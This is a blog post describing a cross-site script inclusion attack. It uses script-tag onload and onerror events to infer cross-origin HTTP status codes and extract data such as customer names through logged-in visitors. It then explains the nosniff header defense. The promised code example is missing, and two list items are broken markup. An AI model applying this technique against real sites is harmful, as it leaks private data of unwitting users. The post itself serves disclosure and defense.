I haven’t seen this specific attack published anywhere, so I’m going to attempt to make this post as comprehensive as possible. Edit: domnul_anonim on Reddit pointed out that Mike Cardwell published the same basic attack before it was called “XSSI”. My blog post presents some new ideas about the attack, but referring to it as “new” is a bit bold and isn’t quite appropriate.
I’ve also structured this paper for easy reference. The structure is as follows:
- Attack Requirements
- Further study
TLDR Attack: Read “A More Interesting Example” in the Attack section below for a walkthrough.TLDR Defense: Use the nosniff HTTP header (“Requirement 1” explained in Defense section below).
I won’t explain the basics of XSSI because I lack the room. SCIP has a blog post explaining XSSI in great depth. I consider it the best reference and introduction on the subject. I’m presenting an attack on non-script content injection. Stronger attacks on non-script content are explained in the cited blog but the attacks tend to require more specialized circumstances (encoding and injection tricks) than the one I will be demonstrating.
1.) The Attack
The basic idea is very similar to a XSSI login oracle. An attacker attempts to load script tags to his page that point at a different origin. By handling the onerror, onload, and window.onerror functions, an attacker can learn information about how the cross-origin server responded to the GET request. I was surprised to learn that onerror executes if you receive a non-2XX response, and onload executes otherwise. This is regardless of the content type returned, unless strict content type is being enforced (see Requirement 1).
So what’s the big deal? What can you learn from a 200 vs a 400 response? Well, it depends on the endpoint but potentially a lot. After all, the HTTP status code is meant to return information, and often does for API’s.
Some Basic Examples
A More Interesting Example
Let’s walk through a more interesting example in greater detail. Imagine a ticketing system that has a search field which is used to look up customer information. Sending a GET to “/search?c=d*”, where the “*” character is acting as a wildcard, will return all the customers that start with the letter “d” and a 200 status code. If no customers match the “d*” pattern, then a 500 is returned. An attacker wants this information, but can’t login and just look. So instead he asks an already logged in user to make requests in the attacker’s behalf and tell the onload function “yes, I found someone” or tell the onerror function “no, that search returned nothing”.
It’s similar to exploiting a blind SQL injection except it’s through a third party and you’re abusing Same-Origin Policy instead of syntax. Notice, the content type returned in the body by the ticketing system does not need to be assumed here. The search can return JSON, XML, HTML or even an image, it’s all the same to this attack as long as the nosniff header isn’t being returned (Requirement 1 in defense). URL parameters can be included in the script src attribute so an attacker can create a script like so:
Any visitor to the attacker’s site will then automatically send a GET request to the ticketing system, cross-origin. If there’s a customer that starts with “a”, then the endpoint will return a 200 and the onload will execute. The attacker’s onload handler would then load another script into the DOM asking if there are any customers that start with “aa”. If the onerror event occurs it’s because there were not customers that started with the letter “a”, so the attacker would then load another script into the DOM checking for customers who start with the letter “b”. The script would continue with a tree searching algorithm until a valid customer name was returned.
Once a customer name is discovered, the same type of attack can be used to search other API endpoints that require a customer name and return other information. For example, an endpoint that searches for email addresses associated to a customer. The attacker could also search for customers matching the “*” pattern. If this fails it means the visitor doesn’t have access to the ticketing system customer search and no further requests need to be made. Because the information stealing requests are being performed by visitors to the attacker’s site, the attack can be parallelized across all visitors. Put all this together with a social engineering email and there is potential for a lot of information leakage from even an internal ticketing systems.
2.) Attack Requirements
To put it simply, the following elements are required:
- The endpoint must respond to a GET request.
- span class=”redactor-invisible-space”>
- span class=”redactor-invisible-space”>
3.) The Defense
You just have to disturb one of the above requirements. Let’s go through the requirements in greater detail from a defensive perspective.
If the ‘X-Content-Type-Options: nosniff’ HTTP header is returned, this attack won’t work. This is the simplest to verify and to implement. If you want to fix your site this is probably the way to do it. The nosniff header is a way the server can tell a browser “When I say I am giving you <Content-Type> I mean it is really <Content-Type>!”.
Note: This is only true for browsers that respect the nosniff header. IE and Chrome were the first to support this header. Firefox has followed also, I don’t know when support started but I have found Firefox 50 Firefox 51 honors nosniff while Firefox 45.5 does not. I assume Edge will act the same as IE, but I haven’t personally tested either of them. Edit: 1lastBr3ath from Reddit pointed out Safari doesn’t support the no-sniff header, Edge does. Also he corrected my mistake, it is Firefox 51 not 50 that included support for no-sniff.
Note2: On the topic of what content type, 1lastBr3ath from reddit pointed me to this documentation, which is really where I should’ve pointed to.
So all content types won’t work in script tags. However, typical informational content types, like XML or JSON will. This restriction can potentially be bypassed by just using a different tag (See Further Study: other tags).
Script tags only work with GET requests. So if your endpoint only accepts POST requests, then this attack can’t be performed. This requirement is seemingly simple, but be careful. You may have designed your API to accept POST requests but your content management system may accept GET requests all the same.
If the endpoint always returns a 200, then there is no information within the status code to steal. However, status codes exist for a reason! Don’t just go abandoning a core part of the HTTP protocol just to stop this attack. Use the nosniff header instead.
If an attacker is in a position to just load up the secret information in his own browser, then there is no need for this attack. This attack revolves around an attacker domain asking a visitor to use their privileged position to get more information. Privileged position will most commonly mean authenticated, but could also mean network position. If your home router has this vulnerability, malicious public sites can request scripts from it and leak information.
4.) Further Study
I have given little attention to open redirects and 3XX responses, which could expand the attack further. So far it does appear redirecting to a 2XX acts like a 2XX and redirecting to a non-2XX acts like a non-2XX. This means an endpoint protecting itself by checking the referer header might be bypassed if an open redirect is discovered. This is a neat idea too.
I believe img tags pointing cross-origin behave similar to script tags. Maybe loading a resource in both img and script tags could lead to more information disclosure due to parsing differences. CSS may also deserve a look.
I was hoping Subresource Integrity would yield further information leaks, but it wisely requires CORS to work. If you can get around CORS then there are bigger problems then this attack.
I have spent most of my time testing onload, onerror, and window.onerror to get information. Observing more attributes may yield other attacks or more information per request.
5.) In Summary
Any detectable difference in loading a cross origin resource is information. That information may be as minor as a login oracle, but could potentially be as bad as credentials (though unlikely).
Defenders: A misunderstanding of content type is a common vector for all sorts of attacks. Enforcing strict content type with the nosniff HTTP header will mitigate this and many more attacks. It also puts you in a failsafe position. A response with improper content will cause an error that will be obvious to anyone and fixed easily.
Attackers: Same origin policy is a little understood concept, which makes it a great source of bugs. Look for sensitive information returned in GET requests. Then see if you can detect any difference in behavior when requesting that information cross origin via script tags.